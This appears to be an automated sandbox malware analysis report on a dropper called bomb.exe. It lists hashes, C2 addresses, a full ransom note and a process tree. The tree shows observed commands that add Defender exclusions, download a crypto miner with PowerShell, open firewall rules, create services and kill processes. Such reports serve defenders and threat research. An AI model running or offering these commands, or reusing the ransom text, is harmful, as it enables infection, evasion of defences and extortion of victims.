Analysis

  • max time kernel
    58s
  • max time network
    64s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2025 16:30

General

  • Target

    bomb.exe

  • Size

    12KB

  • MD5

    a14e63d27e1ac1df185fa062103aa9aa

  • SHA1

    2b64c35e4eff4a43ab6928979b6093b95f9fd714

  • SHA256

    dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453

  • SHA512

    10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082

  • SSDEEP

    192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Malware Config

Extracted

Family

redline

Botnet

Feb2025

C2

176.65.144.135:65012

Extracted

Family

phorphiex

C2

http://91.202.233.141

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note
ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :A1E99C39311B397126C5E023DD7FFFECDACFE77BF5C7B261BF80BBE5F51AC937A8ED476380AAD8141B5CCD5A3333E1AC68B85D701595667ACEA3A515B705E0677110930A9626288C945B8D4D955B42B7DD0A3832E30F9E6D560377300A7BA5F650E97D4E82A75080668515373396D2048817A4D842A2B41823031F60A11E1A1933D7E2BF21A1E68C0EBA57B607F942086D57B8B5F14C0E81FD929A9C1FBE7936E50BCA773DB02CB7995710C39446648AD6534E5D05B00C293D73701B8882307A9D645FF161A7FE85BB4116314367754173B1830D729008C8941755835D842070C56E9EACD70552D2C90D10CF3161C4747699908D4D3DFC73B20C093F5A7011BF2B584D4B8434A3158780BB3620188E65A29C6890649B58BBE0649B30C83C0BD4448BA493B14C5BD0E8AD6F41B777FA41B41A14A499966F8098CD76B7A665797766798F794F5BB0E8B388E24E1662BD57BC69C4E04D1A6B8A18B870C18E1E30A7948BBBAA7E3BDB4C49BD9FE5E500D84DFB900110DECB74385C6BE42D05361B7A24E3321B999CF41DC98D2BA452C7F0DA2763A74CAF046E70D12160481EE5880338FE65CBCE43FCFEA047805CFA3777649E5B77DC51DCF816A68F602E45F1ECAFE9840D9DF48794D0C51788A56183B9D35CDFEB18F1983BD378ACCECAA1ECAB8135020A6395FB764208393F5BD938D4C316584F9C6507BDB1F76175A15C5BA2852851790F7FA210D8DC520B05D030FD23AEE1631D10F7B1D71FF08216D4504F4160737FF2017390CA9BC0706D9099EC5A3CA722EFE1C7614FEB34109E21E60A1DCB2D2EC5BBA02FBEA881B6813F3A4C2084E461395C8055DBA6182E8D2DDE8A5B861AF7F54F23465D6A774291F145D71B2EC886FABA480DF1B9BE88C3978F351D6D3852B405E40AEF5A54BF367ED3AB569C66F1F54B932878F95DA68EDDEDF258D6382C257109A7000FD82E6E234E0CA19D9EB8693DF2D0271EEF9250E9BC5495D56558E0B0A7D331041A55F34EB67BC2864A5AD100EBC6F9BF5836D8BE668073EB9AF3E4505ADFCE43040AD4300498CC9F7AEA37F4B11E74594469EB960083E867463617AAA3ABEEFBE24AF15A10EA09A873D44C20E5B682D6D9F5CE9FEB1A8675AEB87DD2AB9B47FE4C99FA8AB606C196714A38A513846D932AA0192D73CC565B3DE039332277A381472C4F4CA77631A7FDC7FCFB3E0E2125AAFA3D34DA1DF319F2313D03A6180349BB885693EEF7384FCA45521A3D8698FE68EBDCC6B41B6621403F8D72124EDD52BA96A57A8231EDBDC4E1A466F7FFAF1AD5FBCC69C25199AFA382B0F336CB83576ECBC24A25F444741FC7CC24DC9D76349798216AC1DDD4C973D419CEC8FA402200350A054BFFF100A8D81BDDE299ED63F6C068B1BE3F3BE1887C1E0B15B63D37B3DA1A410C919B91B24CA0BB66C638F59AC31D1B3B7E7272898AFADB59CB19B4634A2C273B2D7F3707A3981AF16347C772ECD0FA6B0BECC25E836191968BF68E0114BC29AEB5FF2097BC705F967FF6A2151A0DD9C2A476C697B2936E05728480BE657322266D4AD8FA30C68AF59388BE6C75565A0C15E03E3FC351EFE46F416CB65941C95E823780E5E7E15454051FBCC25C58FAA7312E9B36B87A0181E833103BC5CECB9D1603A063E6F19F011ED1ADED3F24D6D6EF152F23336085804A701D2E7385518854078F4C2197B3DD54434136C7F80C81091B255075AADFD01338A824E91854CBF7CD90319E624B50BFE7EE4D33BB62B171E8F22B9C7E96F32DCD79774853A1DE71C2594E6A067B633E296C110D37A1B6B3D58DD8D27B43A7232179779AEADA4728FB350C81CD1CFF93A8ABAD38C1BE9D3CDDF47B61E0A49227903B4F74D65C048085D2FB622348FB1CCDD6DE42773991B98CDD140669DFEB6B292FED80107C7FCB80AFA18398C65E7EC2634716A212342528FF390EF7BD4766BE02B3E813DD8F3E749E1D678D3F52E36967C1DF95075D884DB1A4D94CB52160FF8921D95AAF2962FCC618666CBB69D21E382826FDF4C80EDD4D165D4929467E689099BED0848A012C6B2DA0C6D19A72FC9103ADB8CC56614B01918F4489FE3DBC16CF89FEE7BF962475F4F101F4024F9C830BFC7AD5E24326F6CF6B884574643FAFD9C3B898EE69B3A84507EF15605777A2B5EEFD786B074B3A3E3559A40725686A86EC691D59E9976E41F2F68442992768BD4BFF0ECB21411240634FC98464F593D0BB66443D6E3C12E59765A98024A25284EFFB6D812BB9EE8606322A7F9E300E7A0D6137217071C712ED6DB0C7504BF1E28BA4A40D0989A5467428D223E99A0976A72B8745828CFF001AC5E393F8D488475CDD46086224523E3DE555FF0720CD2EC6

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 12 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 9 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bomb.exe
    "C:\Users\Admin\AppData\Local\Temp\bomb.exe"
    1⤵
    • Downloads MZ/PE file
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
      2⤵
      • Downloads MZ/PE file
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Users\Admin\AppData\Local\Temp\2594210103.exe
        C:\Users\Admin\AppData\Local\Temp\2594210103.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Users\Admin\sysnldcvmr.exe
          C:\Users\Admin\sysnldcvmr.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1652
          • C:\Users\Admin\AppData\Local\Temp\2541229726.exe
            C:\Users\Admin\AppData\Local\Temp\2541229726.exe
            5⤵
              PID:5212
            • C:\Users\Admin\AppData\Local\Temp\1659228236.exe
              C:\Users\Admin\AppData\Local\Temp\1659228236.exe
              5⤵
                PID:7736
        • C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3004
          • C:\Windows\sysnldcvmr.exe
            C:\Windows\sysnldcvmr.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3760
        • C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3280
          • C:\Windows\svchost.exe
            "C:\Windows\svchost.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3264
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
              4⤵
              • Modifies Windows Firewall
              PID:860
        • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\WindowsServices.exe
            "C:\Windows\WindowsServices.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:5032
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
              4⤵
              • Modifies Windows Firewall
              PID:2580
        • C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4024
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 856
            3⤵
            • Program crash
            PID:508
        • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe"
          2⤵
          • Executes dropped EXE
          PID:4360
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "WinUpdt"
            3⤵
            • Launches sc.exe
            PID:4212
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "WinUpdt" binpath= "C:\ProgramData\WinUpdt\wincsupdt.exe" start= "auto"
            3⤵
            • Launches sc.exe
            PID:460
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            3⤵
            • Launches sc.exe
            PID:1264
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "WinUpdt"
            3⤵
            • Launches sc.exe
            PID:1276
        • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2468
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3212
            • C:\Windows\system32\sc.exe
              sc delete "WinSvcs"
              4⤵
              • Launches sc.exe
              PID:1548
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
              4⤵
                PID:4456
          • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe
            "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe"
            2⤵
            • Executes dropped EXE
            PID:220
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" ""
              3⤵
                PID:4364
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit
                  4⤵
                    PID:1588
                    • C:\Windows\system32\schtasks.exe
                      schtasks /delete /f /tn "winsrvcs"
                      5⤵
                        PID:4168
                • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe
                  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:964
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
                    3⤵
                      PID:3088
                      • C:\Windows\system32\sc.exe
                        sc delete "WinUpdt"
                        4⤵
                        • Launches sc.exe
                        PID:5028
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
                        4⤵
                          PID:1424
                    • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe
                      "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe"
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:3188
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
                        3⤵
                        • Indicator Removal: Clear Persistence
                        PID:336
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /Delete /TN "Microsoft Windows Security" /F
                          4⤵
                            PID:3188
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
                          3⤵
                            PID:1456
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM dwm.exe
                              4⤵
                              • Kills process with taskkill
                              PID:3368
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                            3⤵
                              PID:1252
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM conhost.exe
                                4⤵
                                • Kills process with taskkill
                                PID:1836
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                              3⤵
                                PID:1840
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM conhost.exe
                                  4⤵
                                  • Kills process with taskkill
                                  PID:4324
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                                3⤵
                                  PID:3716
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM conhost.exe
                                    4⤵
                                    • Kills process with taskkill
                                    PID:376
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                                  3⤵
                                    PID:1308
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM conhost.exe
                                      4⤵
                                      • Kills process with taskkill
                                      PID:3760
                                • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe
                                  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3444
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe delete "WinUpla"
                                    3⤵
                                    • Launches sc.exe
                                    PID:3604
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe start "WinUpla"
                                    3⤵
                                    • Launches sc.exe
                                    PID:1832
                                • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe
                                  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe"
                                  2⤵
                                    PID:1176
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
                                      3⤵
                                        PID:3540
                                        • C:\Windows\system32\sc.exe
                                          sc delete "Windows Services"
                                          4⤵
                                          • Launches sc.exe
                                          PID:3160
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
                                          4⤵
                                            PID:1840
                                      • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
                                        "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe"
                                        2⤵
                                          PID:1532
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                                            3⤵
                                              PID:4356
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:904
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                                              3⤵
                                                PID:2668
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:5156
                                            • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
                                              "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe"
                                              2⤵
                                                PID:1624
                                              • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
                                                "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe"
                                                2⤵
                                                  PID:1264
                                                • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe"
                                                  2⤵
                                                    PID:536
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
                                                      3⤵
                                                        PID:1860
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:5520
                                                    • C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe"
                                                      2⤵
                                                        PID:1656
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
                                                          3⤵
                                                          • Indicator Removal: Clear Persistence
                                                          PID:3484
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft Windows Security" /F
                                                            4⤵
                                                              PID:5652
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
                                                            3⤵
                                                              PID:1988
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /F /IM dwm.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:5620
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                                                              3⤵
                                                                PID:2472
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                                                                3⤵
                                                                  PID:4332
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                                                                  3⤵
                                                                    PID:1676
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
                                                                    3⤵
                                                                      PID:212
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /F /IM conhost.exe
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:5876
                                                                  • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe"
                                                                    2⤵
                                                                      PID:4804
                                                                    • C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe"
                                                                      2⤵
                                                                        PID:2608
                                                                      • C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe"
                                                                        2⤵
                                                                          PID:548
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                            3⤵
                                                                              PID:5180
                                                                          • C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe"
                                                                            2⤵
                                                                              PID:4080
                                                                            • C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe"
                                                                              2⤵
                                                                                PID:1800
                                                                              • C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe"
                                                                                2⤵
                                                                                  PID:2496
                                                                                • C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe"
                                                                                  2⤵
                                                                                    PID:5264
                                                                                  • C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe"
                                                                                    2⤵
                                                                                      PID:5720
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4024 -ip 4024
                                                                                    1⤵
                                                                                      PID:3868
                                                                                    • C:\ProgramData\WinUpdt\wincsupdt.exe
                                                                                      C:\ProgramData\WinUpdt\wincsupdt.exe
                                                                                      1⤵
                                                                                        PID:2252
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          C:\Windows\system32\conhost.exe
                                                                                          2⤵
                                                                                            PID:536
                                                                                          • C:\Windows\system32\notepad.exe
                                                                                            notepad.exe
                                                                                            2⤵
                                                                                              PID:3544
                                                                                          • C:\ProgramData\WinUpla\winuspdt.exe
                                                                                            C:\ProgramData\WinUpla\winuspdt.exe
                                                                                            1⤵
                                                                                              PID:5012
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                C:\Windows\system32\conhost.exe
                                                                                                2⤵
                                                                                                  PID:4820
                                                                                                • C:\Windows\system32\dwm.exe
                                                                                                  dwm.exe
                                                                                                  2⤵
                                                                                                    PID:3604
                                                                                                • C:\Windows\system32\dwm.exe
                                                                                                  "dwm.exe"
                                                                                                  1⤵
                                                                                                    PID:1700

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2541229726.exe

                                                                                                    Filesize

                                                                                                    35KB

                                                                                                    MD5

                                                                                                    c545fb64741a4feee20311d984dd6e40

                                                                                                    SHA1

                                                                                                    6db2c5d832811f878a1f35e76bffa83b40b8708e

                                                                                                    SHA256

                                                                                                    f600f88f4d2557b3c567344da5ca8bd976eb3aaa3d6b36ed95cb66b16b54d5b6

                                                                                                    SHA512

                                                                                                    8779055a7ba7ce0a088500639540863e784092d3ebfdd1268f2bfa43b048ebe53cb6f0452da0a13bbca69e531517d7b86bb297c54cc223d0948f602547b9fbf2

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    MD5

                                                                                                    5bbf43f665e45ac4870e31cc9824326d

                                                                                                    SHA1

                                                                                                    17ec6c597ed7d43ee4048a8fc582eebb7dd43a41

                                                                                                    SHA256

                                                                                                    7df0aedaebb674c8609efe7329d8186a9568dcc7015ddd6a854fa7c76c7248eb

                                                                                                    SHA512

                                                                                                    c3cdb2a521684e382de3a7679ae311ba1458e36adffadaf0b40b088a646227d92c59f29fe804f1655818c6cb6ea2bb733a1fa0ae138e796357ee5664b30226d0

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2xnygutd.qgt.ps1

                                                                                                    Filesize

                                                                                                    60B

                                                                                                    MD5

                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                    SHA1

                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                    SHA256

                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                    SHA512

                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\http147.45.44.68lsrwva.exe.exe

                                                                                                    Filesize

                                                                                                    249B

                                                                                                    MD5

                                                                                                    5925dfb3f3b833ccf04bedce8333ab9d

                                                                                                    SHA1

                                                                                                    4e579bb293275c581718be0e6dff38d2e8791f38

                                                                                                    SHA256

                                                                                                    45271d1cb6c8be70c3e0c4660ec276655a1162d909f95a2620dcfbf23b4c8caa

                                                                                                    SHA512

                                                                                                    de89c9f375715c6b934b718b97dfe408d82a0871c87944d88337292859007e0c522e73ac4260582e4d98b7fef23b0d4cc8d14d96d6b322dc9b09dea4c2799616

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe

                                                                                                    Filesize

                                                                                                    1.6MB

                                                                                                    MD5

                                                                                                    ba4db99a746782a31ee57c4cea548f77

                                                                                                    SHA1

                                                                                                    25566b3100daa884fcb823e0a7cf54f0c46d3762

                                                                                                    SHA256

                                                                                                    3b9f69de85da3afbf0037983aed7191f7a53ccebbeff5576c3f7e3ed8512bb51

                                                                                                    SHA512

                                                                                                    b9592f70b527e7c30eb380612db33ba08dc565edb71115f006e82006189533447d589cdc866e49ccbf3feaa941a53db058891a2dfff311b34842d1a0198b78df

